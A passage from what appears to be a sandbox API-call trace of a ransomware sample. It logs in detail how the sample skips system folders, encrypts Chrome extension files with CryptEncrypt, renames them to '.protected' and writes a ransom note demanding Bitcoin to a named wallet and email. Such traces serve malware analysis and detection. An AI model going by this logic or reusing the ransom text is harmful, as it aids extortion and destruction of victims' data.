(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.772] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.773] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.773] CloseHandle (hObject=0x164) returned 1 [0078.773] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0078.773] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0078.773] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl") returned 141 [0078.773] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0078.773] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0078.773] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*") returned 143 [0078.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.774] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.774] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.774] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\.") returned 143 [0078.775] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.775] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.775] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.775] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\..") returned 144 [0078.775] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.775] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.775] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.775] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.775] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.775] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.775] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.775] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.775] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.775] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.775] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json") returned 155 [0078.776] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.776] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.776] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.776] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.776] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.776] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.777] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.777] CloseHandle (hObject=0x168) returned 1 [0078.777] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected") returned 165 [0078.777] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\messages.json.protected")) returned 1 [0078.778] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.778] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.778] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0078.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.778] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.778] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.779] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.779] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.779] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.779] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.779] CloseHandle (hObject=0x164) returned 1 [0078.779] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0078.779] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0078.779] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 144 [0078.779] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0078.779] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0078.779] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*") returned 146 [0078.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.779] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.779] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.779] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\.") returned 146 [0078.780] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.780] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\..") returned 147 [0078.780] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.780] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.780] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.780] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.780] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.780] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.780] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.780] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned 158 [0078.780] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.780] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.781] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.781] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.781] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.782] CloseHandle (hObject=0x168) returned 1 [0078.782] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0078.782] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0078.782] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.782] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.782] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 162 [0078.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.782] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.782] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.783] lstrlenA 